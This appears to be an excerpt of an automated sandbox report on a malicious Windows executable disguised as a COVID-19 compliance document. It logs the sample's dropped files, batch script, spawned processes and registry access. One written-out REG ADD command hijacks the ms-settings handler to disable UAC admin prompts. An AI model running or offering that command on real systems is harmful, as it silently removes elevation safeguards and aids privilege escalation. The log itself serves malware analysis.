              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6856:120:WilError_01
              Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat
              Source: C:\Users\user\Desktop\Customer Report on COVID-19 Non-Complaince. Doc.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\user\Desktop\Customer Report on COVID-19 Non-Complaince. Doc.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\user\Desktop\Customer Report on COVID-19 Non-Complaince. Doc.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Windows\SysWOW64\notepad.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\user\Desktop\Customer Report on COVID-19 Non-Complaince. Doc.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Users\user\Desktop\Customer Report on COVID-19 Non-Complaince. Doc.exe | File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\Desktop\Customer Report on COVID-19 Non-Complaince. Doc.exe | File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\Desktop\Customer Report on COVID-19 Non-Complaince. Doc.exe | File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\Desktop\Customer Report on COVID-19 Non-Complaince. Doc.exe | File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | File read: C:\Windows\System32\drivers\etc\hosts
              Source: Customer Report on COVID-19 Non-Complaince. Doc.exe | ReversingLabs: Detection: 10%
              Source: C:\Users\user\Desktop\Customer Report on COVID-19 Non-Complaince. Doc.exe | File read: C:\Users\user\Desktop\Customer Report on COVID-19 Non-Complaince. Doc.exe
              Source: unknown | Process created: C:\Users\user\Desktop\Customer Report on COVID-19 Non-Complaince. Doc.exe 'C:\Users\user\Desktop\Customer Report on COVID-19 Non-Complaince. Doc.exe'
              Source: unknown | Process created: C:\Windows\SysWOW64\notepad.exe C:\Windows\System32\Notepad.exe
              Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat
              Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
              Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat
              Source: unknown | Process created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\SOFTWARE\Classes\ms-settings\shell\open\command' /t REG_SZ /d 'C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f' /f
              Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknown | Process created: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe'
              Source: unknown | Process created: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe'
              Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
              Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
              Source: C:\Users\user\Desktop\Customer Report on COVID-19 Non-Complaince. Doc.exe | Process created: C:\Windows\SysWOW64\notepad.exe C:\Windows\System32\Notepad.exe
              Source: C:\Users\user\Desktop\Customer Report on COVID-19 Non-Complaince. Doc.exe | Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
              Source: C:\Windows\SysWOW64\notepad.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat
              Source: C:\Windows\SysWOW64\notepad.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\SOFTWARE\Classes\ms-settings\shell\open\command' /t REG_SZ /d 'C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f' /f
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
              Source: Window Recorder | Window detected: More than 3 window changes detected